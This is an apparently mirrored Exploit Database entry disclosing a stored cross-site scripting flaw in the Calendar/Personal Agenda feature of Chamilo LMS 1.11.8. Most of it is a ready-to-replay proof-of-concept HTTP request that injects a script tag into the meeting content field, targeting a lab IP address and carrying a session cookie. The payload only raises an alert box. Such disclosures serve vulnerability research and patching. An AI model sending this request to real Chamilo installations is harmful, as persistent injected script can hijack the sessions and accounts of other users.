Chamilo LMS 1.11.8 – Cross-Site Scripting

• Exploit Database
• 18 阅读

• 作者： cakes
  日期： 2018-10-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45535/

• # Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
  # Author: Cakes
  # Discovery Date: 2018-10-05
  # Vendor Homepage: https://chamilo.org
  # Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
  # Tested Version: 1.11.8 for php5
  # Tested on OS: Kali Linux
  # CVE: N/A
   
  # Description:
  # Improper input validation on theCalendar / Personal Agenda page allows attackers add a persistent 
  # Cross-Site scripting attack to the meeting's content field when adding a new meeting.
  # Simply intercept a new meeting request and add in the XSS
   
  # PoC
  
  GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
  Host: 10.0.0.16
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  X-Requested-With: XMLHttpRequest
  Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
  Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
  Connection: close